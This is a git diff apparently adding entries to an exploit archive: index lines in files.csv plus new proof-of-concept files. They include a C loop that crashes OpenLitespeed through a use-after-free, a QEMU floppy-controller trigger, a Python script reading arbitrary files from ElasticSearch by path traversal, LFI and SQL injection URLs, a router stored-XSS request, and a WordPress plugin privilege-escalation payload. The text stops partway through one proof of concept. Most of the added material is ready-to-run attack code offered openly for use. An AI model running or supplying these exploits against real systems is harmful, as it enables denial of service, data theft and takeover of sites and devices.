diff --git a/files.csv b/files.csv index 961359ea5..84c7f68fa 100755 --- a/files.csv +++ b/files.csv @@ -6985,7 +6985,7 @@ id,file,description,date,author,platform,type,port 7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0 -7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 +7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0 @@ -33392,6 +33392,7 @@ id,file,description,date,author,platform,type,port 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0 +37005,platforms/hardware/webapps/37005.txt,"IPLINK IP-DL-801RT-B - (Url Filter Configuration Panel) Stored XSS",2015-05-13,"XoDiAK BlackHat",hardware,webapps,0 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0 @@ -33434,6 +33435,11 @@ id,file,description,date,author,platform,type,port 37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 +37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0 +37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 +37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0 +37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal",2015-05-18,pandujar,php,webapps,0 37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80 @@ -33447,3 +33453,14 @@ id,file,description,date,author,platform,type,port 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve ""/bin/sh"" - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 +37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 +37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0 +37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0 +37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 +37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 +37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80 +37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability",2015-05-21,"Hannes Trunde",php,webapps,80 diff --git a/platforms/hardware/webapps/37005.txt b/platforms/hardware/webapps/37005.txt new file mode 100755 index 000000000..b6b4017b4 --- /dev/null +++ b/platforms/hardware/webapps/37005.txt @@ -0,0 +1,44 @@ +# Exploit Title: IPLINK IP-DL-801RT-B (Url Filter Configuration Panel) +Stored XSS +# Google Dork: N/A +# Date: 13/05/2015 +# Exploit Author: Xodiak xodiak.blackhat@gmail.com +# Vendor Homepage: http://iplink.com.tw +# Software Link: N/A +# Version: All Version +# Tested on: Kali Linux +# CVE : N/A +# +Interductions: +A Stored XSS Vulnerability In Url Filter Configuration Panel Discovered. + +If Any JavaScript Code Add In Form Can Open Ports , Enable UPNP , Disable +Firewall ,Hijack Bowser By Beef And,etc.. + +This Can Harm System And Modem :) + +POC: +http://192.168.1.1/url_nokeyword.htm + +GET /url_nokeyword.htm HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 +Firefox/18.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.1/code.htm +Authorization: Basic YWRtaW46YWRtaW4= +Connection: keep-alive + +HTTP/1.1 200 OK +Server: Virtual Web 0.9 +Content-Length: 2690 + + + +=================== +Greetz : +=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza +Attacker,MMA Defacer,END3R +Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-= diff --git a/platforms/linux/dos/37051.c b/platforms/linux/dos/37051.c new file mode 100755 index 000000000..c805cabee --- /dev/null +++ b/platforms/linux/dos/37051.c @@ -0,0 +1,161 @@ +/* +* Openlitespeed 1.3.9 Use After Free denial of service exploit. +* +* This exploit triggers a denial of service condition within the Openlitespeed web +* server. This is achieved by sending a tampered request contain a large number (91) +* of 'a: a' header rows. By looping this request, a memmove call within the HttpReq +* class is triggered with a freed pointer, resulting in a reference to an invalid +* memory location and thus a segmentation fault. +* +* UAF Request: +* GET / HTTP/1.0 +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* a: a +* +* The above request should be placed into a file name 'uafcrash' prior to running this +* exploit code. +* +* Date: 24/03/2015 +* Author: Denis Andzakovic - Security-Assessment.com +* +*/ + +#include +#include +#include +#include +#include +#include + +extern int errno; + +int main(int argc, char ** argv){ + FILE * fp; + size_t len = 0; + char * line; + if((fp = fopen("uafcrash", "r")) == NULL){ + fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno)); + return 1; + } + + char * host = "127.0.0.1"; + int port = 8088; + int count = 0; + int sock; + struct sockaddr_in serv_addr; + while(1){ + if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){ + fprintf(stderr, "[!] Error: Could not create socket \n"); + return 1; + } + + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = htons(port); + inet_pton(AF_INET, host, &serv_addr.sin_addr); + + if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){ + fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count); + close(sock); + return 1; + } + while ((getline(&line, &len, fp)) != -1){ + + write(sock, line, strlen(line)); + } + + close(sock); + rewind(fp); + count++; + } + + return 42; +} diff --git a/platforms/multiple/dos/37053.c b/platforms/multiple/dos/37053.c new file mode 100755 index 000000000..705a8ad60 --- /dev/null +++ b/platforms/multiple/dos/37053.c @@ -0,0 +1,14 @@ +// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2 + +#include + +#define FIFO 0x3f5 + +int main() { + int i; + iopl(3); + + outb(0x0a,0x3f5); /* READ ID */ + for (i=0;i<10000000;i++) + outb(0x42,0x3f5); /* push */ +} \ No newline at end of file diff --git a/platforms/php/webapps/37054.py b/platforms/php/webapps/37054.py new file mode 100755 index 000000000..122cfc03d --- /dev/null +++ b/platforms/php/webapps/37054.py @@ -0,0 +1,56 @@ +#!/usr/bin/python +# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign +# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 +# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net +# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ +# +# Source: https://github.com/pandujar/elasticpwn/ + +import socket, sys + +print "!dSR ElasticPwn - for CVE-2015-3337\n" +if len(sys.argv) <> 3: + print "Ex: %s www.example.com /etc/passwd" % sys.argv[0] + sys.exit() + +port = 9200 # Default ES http port +host = sys.argv[1] +fpath = sys.argv[2] + +def grab(plugin): + socket.setdefaulttimeout(3) + s = socket.socket() + s.connect((host,port)) + s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n" + "Host: %s\n\n" % (plugin, fpath, host)) + file = s.recv(2048) + print " [*] Trying to retrieve %s:" % fpath + if ("HTTP/1.0 200 OK" in file): + print "\n%s" % file + else: + print "[-] File Not Found, No Access Rights or System Not Vulnerable" + +def pfind(plugin): + try: + socket.setdefaulttimeout(3) + s = socket.socket() + s.connect((host,port)) + s.send("GET /_plugin/%s/ HTTP/1.0\n" + "Host: %s\n\n" % (plugin, host)) + file = s.recv(16) + print "[*] Trying to find plugin %s:" % plugin + if ("HTTP/1.0 200 OK" in file): + print "[+] Plugin found!" + grab(plugin) + sys.exit() + else: + print "[-] Not Found " + except Exception, e: + print "[-] Error connecting to %s: %s" % (host, e) + sys.exit() + +# Include more plugin names to check if they are installed +pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] + +for plugin in pluginList: + pfind(plugin) \ No newline at end of file diff --git a/platforms/php/webapps/37070.txt b/platforms/php/webapps/37070.txt new file mode 100755 index 000000000..a765402e0 --- /dev/null +++ b/platforms/php/webapps/37070.txt @@ -0,0 +1,46 @@ +source: http://www.securityfocus.com/bid/52944/info + +Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected. + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?inputname="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?buttontext="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?filetypeexts="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?filetypedesc="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?filesizelimit="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?uploadmode="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?metatype="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?parentid="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?path="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +shortcode/index.php?url="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +partials/file.php?fileid="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +partials/file.php?inputname="> + +http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ +file/error.php?error="> \ No newline at end of file diff --git a/platforms/php/webapps/37071.txt b/platforms/php/webapps/37071.txt new file mode 100755 index 000000000..ea31bba4b --- /dev/null +++ b/platforms/php/webapps/37071.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52946/info + +CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability. + +An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver. + +CitrusDB 2.4.1 is vulnerable; other versions may also be affected. + +http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base \ No newline at end of file diff --git a/platforms/php/webapps/37072.txt b/platforms/php/webapps/37072.txt new file mode 100755 index 000000000..6ace83391 --- /dev/null +++ b/platforms/php/webapps/37072.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52970/info + +Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Matterdaddy Market 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory + +http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory \ No newline at end of file diff --git a/platforms/php/webapps/37073.html b/platforms/php/webapps/37073.html new file mode 100755 index 000000000..0467badec --- /dev/null +++ b/platforms/php/webapps/37073.html @@ -0,0 +1,130 @@ +source: http://www.securityfocus.com/bid/52983/info + +BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +BGS CMS 2.2.1 is vulnerable; other versions may also be affected. + + +BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities + + + +
+ + + + + + + + + +
+ +
+ + + + + + + + + + +
+ +
+ + + + + + + + +
+ +
+ + + + + + + + +
+ +
+ + + + + + + + +
+ +
+ + + + + + +
+ +
+ + + + +
+ +
+ + +
+ +

+ + +

XSS 0


+ + +

XSS 1


+ + +

XSS 2


+ + +

XSS 3


+ + +

XSS 4


+ + +

XSS 5


+ + +

XSS 6



+ + +

XSS 7



+ + \ No newline at end of file diff --git a/platforms/php/webapps/37074.txt b/platforms/php/webapps/37074.txt new file mode 100755 index 000000000..28b9f28f5 --- /dev/null +++ b/platforms/php/webapps/37074.txt @@ -0,0 +1,106 @@ +# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities] +# Date: 2015/05/19 +# Exploit Author: Panagiotis Vagenas +# Contact: https://twitter.com/panVagenas +# Vendor Homepage: http://wpmembership.e-plugins.com/ +# Software Link: http://codecanyon.net/item/wp-membership/10066554 +# Version: 1.2.3 +# Tested on: WordPress 4.2.2 +# Category: webapps + +======================================== +* 1. Privilege escalation + ======================================== + +1.1 Description + +Any registered user can perform a privilege escalation through +`iv_membership_update_user_settings` AJAX action. +Although this exploit can be used to modify other plugin related data +(eg payment status and expiry date), privilege escalation can lead to a +serious incident because the malicious user can take administrative role +to the infected website. + +1.2 Proof of Concept + +* Login as regular user +* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` +with data: +`action=iv_membership_update_user_settings&form_data=user_id%3D%26user_role%3Dadministrator` + + +1.3 Actions taken after discovery + +Vendor was informed on 2015/05/19. + +1.4 Solution + +No official solution yet exists. + +======================================== +* 2. Stored XSS +======================================== + +2.1 Description + +All input fields from registered users aren't properly escaped. This +could lead to an XSS attack that could possibly affect all visitors of +the website, including administators. + +2.2 Proof of Concept + +* Login as regular user +* Update any field of your profile appending at the end + `` + or + `